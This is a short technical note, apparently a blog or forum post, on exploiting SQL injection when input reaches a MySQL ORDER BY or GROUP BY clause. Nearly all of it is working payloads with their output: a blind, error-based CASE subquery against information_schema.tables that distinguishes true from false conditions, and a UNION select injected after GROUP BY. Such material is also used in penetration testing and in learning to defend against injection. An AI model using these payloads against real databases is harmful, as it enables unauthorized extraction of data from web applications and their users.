Exploiting SQL Injections when the input goes in the order by clause, is a bit tricky as after 'order by' clause union queries are not permitted. The following could be used in such scenario to form blind sql injection cases:
mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;
+------+
| id |
+------+
| 1 |
+------+
1 row in set (0.00 sec)
----
mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row
-----
For injections where user's input goes to the group by clause, union queries can be used although the above technique will also work for blind injection examples: mysql> select id from news where id =1 group by id union select 2222;
+------+
| id |
+------+
| 1 |
| 2222 |
+------+
2 rows in set (0.00 sec)